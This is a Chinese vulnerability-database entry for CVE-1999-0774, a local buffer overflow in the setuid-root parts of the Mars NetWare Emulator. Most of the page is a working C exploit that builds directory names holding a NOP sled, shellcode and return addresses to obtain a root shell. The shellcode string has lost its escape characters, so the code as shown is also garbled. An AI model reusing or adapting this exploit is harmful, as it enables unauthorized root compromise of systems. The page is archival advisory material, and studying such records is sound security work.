Mars NEW缓冲区溢出漏洞
漏洞ID | 1105529 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-08-31 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0774 |
CNNVD-ID | CNNVD-199908-059 |
漏洞平台 | Linux | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
MarsNetWareEmulation(NWE,mars_nwe)数据包存在缓冲区溢出漏洞。可以借助长目录名导致该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/617/info
There are several buffer overflows in the setuid root components of the Mars Netware Emulator package. They allow for a local root compromise through the overflowing of buffers without bounds checking. It is to be assumed that all versions prior to and including 0.99 are vulnerable to these attacks.
// get a suid shell :)
#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#include <unistd.h>
#define BUFSIZE 254
#define NOP 0x90
#define RET 0xbffff3a0
#define ALIGN 1
int makedir(dir)
char *dir;
{
if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
return -1;
if (chdir(dir))
return -1;
return 0;
}
int main(void)
{
int i = 0, noplen = 0;
char pid[10], buf[BUFSIZE], *ptr = NULL;
char szelkod[] =
"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0d"
"x31xc9xb1x88x80x36x01x46xe2xfaxeax19x2e"
"x63x68x6fx2ex62x69x6cx6ex65x01x35x36x34"
"x34x01x2ex63x68x6fx2ex72x69x01x88xf7x54"
"x88xe4x82xedx19x56x57x52xe9x01x01x01x01"
"x5ax80xc2xcfx11x01x01x8cxbax0bxeexfexfe"
"x88x7cxf1x8cx82x14xeexfexfex88x44xf5x8c"
"x92x1bxeexfexfex88x54xf9xc6x44xfdx01x01"
"x01x01xb9x47x01x01x01x30xf7x30xc8x52x88"
"xf2xccx81x8cx44xf1x88xc0xb9x0ax01x01x01"
"x88xffx30xd3x52x88xf2xccx81x8cx64xddx5a"
"x5fx5exc8xc2x91x91x91x91x91x91x91x91x91"
"x91x91x91x00";
sprintf(pid, "%d", getpid());
if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
{
perror("mkdir()");
return -1;
}
if (chdir(pid))
{
perror("chdir()");
return -1;
}
ptr = buf;
noplen = BUFSIZE - strlen(szelkod);
for (i=0;i<noplen;i++)
*ptr++ = NOP;
*ptr += noplen;
for (i=0;i<strlen(szelkod);i++)
*ptr++ = szelkod[i];
*ptr = ' ';
if(makedir(buf) < 0)
{
perror("makedir()");
return -1;
}
bzero(buf, BUFSIZE);
memset(buf, NOP, 40 + ALIGN);
if(makedir(buf) < 0)
{
perror("makedir()");
return -1;
}
bzero(buf, BUFSIZE);
for(i=0;i<96;i+=4)
*(long *)&buf[i] = RET;
for(i=0;i<2;i++)
{
if(makedir(buf) < 0)
{
perror("makedir()");
return -1;
}
}
return 0;
}
|参考资料
来源:BID
名称:617
链接:http://www.securityfocus.com/bid/617
相关推荐: Windows Media Player (WMP)运行Internet Explorer和处理HTML Microsoft产品漏洞
Windows Media Player (WMP)运行Internet Explorer和处理HTML Microsoft产品漏洞 漏洞ID 1202527 漏洞类型 未知 发布时间 2003-08-27 更新时间 2003-08-27 CVE编号 CVE-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666